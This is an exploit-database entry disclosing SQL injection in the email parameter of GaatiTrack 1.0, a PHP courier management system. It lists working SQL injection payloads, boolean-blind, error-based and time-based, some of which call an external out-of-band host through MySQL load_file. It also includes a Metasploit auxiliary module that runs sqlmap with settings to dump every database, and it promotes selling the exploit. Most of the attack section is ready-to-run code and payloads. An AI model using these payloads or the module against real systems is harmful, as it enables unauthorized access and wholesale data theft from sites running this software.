Share
## https://sploitus.com/exploit?id=PACKETSTORM:210194
# Titles: GaatiTrack-1.0 CopyrightΒ©2025-Multiple-SQLi - Metasploit module
    # Author: nu11secur1ty
    # Date: 10/06/2025
    # Vendor: https://www.mayurik.com/
    # Software:
    https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html
    # Reference: https://portswigger.net/web-security/sql-injection
    
    ## Description:
    The `email` parameter appears to be vulnerable to SQL injection attacks.
    The payload '+(select load_file('\\\\
    geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+' was
    submitted in the email parameter. This payload injects a SQL sub-query that
    calls MySQL's load_file function with a UNC file path that references a URL
    on an external domain. The application interacted with that domain,
    indicating that the injected SQL query was executed.
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Payload:
    - SQLi:
    
    ```SQLi
    ---
    Parameter: email (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery -
    comment)
        Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\
    geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND
    3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE (SELECT 5162 UNION
    SELECT 5005) END))-- -&password=r5I!g0t!W9
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
    BY clause (FLOOR)
        Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\
    geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT
    5507 FROM(SELECT COUNT(*),CONCAT('qkqqq',(SELECT
    (ELT(5507=5507,1))),'qxxpq',FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- YcNj&password=r5I!g0t!W9
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\
    geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT
    2855 FROM (SELECT(SLEEP(11)))jpbI)-- jtuB&password=r5I!g0t!W9
    ---
    ```
    
    [+]MSF exploit:
    
    ```rb
    ##
    # gaati.rb
    #
    # Author: nu11secur1ty
    # Description: gaati-sqli
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(
          'Name'        => 'gaati',
          'Description' => 'gaati-sqli',
          'Author'      => ['nu11secur1ty'],
          'License'     => MSF_LICENSE
        )
    
        register_options(
          [
            OptString.new('RAW_REQUEST', [ true, 'Raw HTTP request (from
    Burp)', '' ]),
            OptString.new('SQLMAP_PATH', [ false, 'Full path to sqlmap.py',
    '/home/kali/sqlmap-nu11secur1ty/sqlmap.py' ])
          ]
        )
      end
    
      def run
        raw_request = datastore['RAW_REQUEST']
        sqlmap_path = datastore['SQLMAP_PATH'] ||
    '/home/kali/sqlmap-nu11secur1ty/sqlmap.py'
    
        if raw_request.nil? || raw_request.empty?
          print_error("RAW_REQUEST is empty β€” will attempt to use system
    exploit.txt if present.")
        end
    
        # Prefer system exploit.txt in MSF module dir (no need to cat)
        system_exploit =
    '/usr/share/metasploit-framework/modules/auxiliary/MSF/exploit.txt'
        use_file = nil
    
        if File.exist?(system_exploit)
          use_file = system_exploit
          print_good("Using existing exploit file: #{use_file}")
        else
          # fallback: write to user-writable home dir
          exploit_dir = File.join(Dir.home, ".msf_exploits")
          Dir.mkdir(exploit_dir) unless Dir.exist?(exploit_dir)
          timestamp = Time.now.strftime("%Y%m%d%H%M%S")
          tmp_file = File.join(exploit_dir, "exploit_#{timestamp}.txt")
    
          if raw_request.nil? || raw_request.empty?
            print_error("No RAW_REQUEST provided and no system exploit.txt
    found β€” nothing to do.")
            return
          end
    
          begin
            File.open(tmp_file, "w") { |f| f.write(raw_request) }
            print_good("Saved RAW_REQUEST -> #{tmp_file}")
            use_file = tmp_file
          rescue Errno::EACCES => e
            print_error("Cannot write temp exploit file: #{e}")
            return
          rescue => e
            print_error("Failed to save temp request: #{e}")
            return
          end
        end
    
        unless File.exist?(sqlmap_path)
          print_error("sqlmap.py not found at #{sqlmap_path}. Set SQLMAP_PATH
    option to correct path.")
          # do not delete the temp file so user can inspect
          return
        end
    
        sqlmap_cmd = [
          "python3",
          sqlmap_path,
          "-r", use_file,
          "--no-cast",
          "--no-escape",
          "--dbms=mysql",
          "--time-sec=11",
          "--random-agent",
          "--level=5",
          "--risk=3",
          "--batch",
          "--flush-session",
          "--technique=TBEUSQ",
          "--union-char=UCHAR",
          '--answers="crack=Y,dict=Y,continue=Y,quit=N"',
          "--dump-all"
        ].join(" ")
    
        print_status("Executing sqlmap: #{sqlmap_cmd}")
        begin
          system(sqlmap_cmd)
          print_good("sqlmap finished (check output above)")
        rescue => e
          print_error("Failed to execute sqlmap: #{e}")
        ensure
          # delete tmp file if we created it
          if use_file != system_exploit
            begin
              File.delete(use_file) if File.exist?(use_file)
              print_status("Deleted temporary file #{use_file}")
            rescue => e
              print_warning("Could not delete temporary file: #{e}")
            end
          end
        end
      end
    end
    
    ```
    
    # Reproduce:
    [href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
    
    # Buy an exploit only:
    [href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
    
    # Time spent:
    01:15:00
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                              nu11secur1ty <http://nu11secur1ty.com/>